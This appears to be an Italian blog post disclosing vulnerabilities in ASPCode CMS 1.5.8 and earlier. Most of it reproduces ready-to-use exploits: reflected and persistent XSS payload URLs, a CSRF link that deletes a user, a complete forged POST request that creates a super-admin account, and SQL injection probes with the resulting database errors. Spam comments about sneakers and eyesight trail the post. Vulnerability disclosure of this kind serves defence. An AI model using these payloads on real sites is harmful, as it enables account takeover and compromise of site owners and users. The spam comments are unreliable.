Alberto Fontanella ha recentemente trovato notevoli exploit di sicurezza all’interno del CMS Italiano basato sul linguaggio ASP, ASPCode CMS.

Le falle risulterebbero affliggere la versione 1.5.8 e precedenti e sfruttano XSS (Cross-site scripting),  CSRF (Cross-site request forgery) e SQL Injection; dopo il salto…tutti gli exploit!

Multiple XSS Vulnerability

http://[host]/default.asp?sec=1&ma1=”><script>alert(“XSS”);</script>
http://[host]/default.asp?sec=1&tag=”><script>alert(“XSS”);</script>
http://[host]/default.asp?sec=1&ma2=”><script>alert(“XSS”);</script>

XSS found also on Form to reset password: http://[host]/default.asp?sec=33&ma1=forgotpass

Put XSS String in Email Field and Submit it

Persistent XSS

Post in Guestbook Section: http://[host]/default.asp?sec=23

<img src=”http://[host]/default.asp?sec=1&ma1=”><script>alert(“XSS”);</script>”></img>

CSRF

To Delete an User Account

http://[host]/default.asp?a1=admin&a2=modules&a3=manage&module=users&ma1=users&ma2=delete&idx=50

To Create a Super Admin Account

POST /default.asp?a1=admin&a2=modules&a3=manage&module=users&ma1=users&ma2=update&idx=-1
HTTP/1.1
Host: [host]
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://[host]/default.asp?a1=admin&a2=modules&a3=manage&module=users&ma1=users&ma2=edit&idx=-1
Content-Type: application/x-www-form-urlencoded
Content-Length: 140

username=HAXOR&password=PASSWD&old_password=&password_is_encrypted=false&email=HAXOR%40BLACKHAT.ORG&roleId=4&redirsectionid=0&confirmed=true

You can use CSRF + XSS (Very Dangerous)

Possible SQL Injection

http://[host]/default.asp?sec=64&ma1=tag&tag=CMS’

Errore numero: -2147217900
Errore: Errore di sintassi (operatore mancante) nell’espressione della query
‘[ID] IN ()’.

Query:
SELECT * FROM [section] s WHERE [ID] IN ()

http://[host]/default.asp=sec=1′

Errore di run-time di Microsoft VBScript (0x800A000D)
Tipo non corrispondente: ‘sectionID’
/include/api.asp, line 657

2
Lascia una recensione

Rispondi

  Subscribe  
più nuovi più vecchi più votati
Notificami
cheap air jordan
Ospite

Post contenuto è molto interessante ed emozionante. Io sono di semplice al here.The contenuto complesso imparato molte cose che si possono venire tutti. Qualunque cosa tu found.By come è possibile visualizzare, che è molto piacevole con alcuni siti web, si può andare come see.such as air jordan 19

trackback

Improve your vision naturally!…

Thanks. Left you a trackback to help your readers improve eye vision naturally….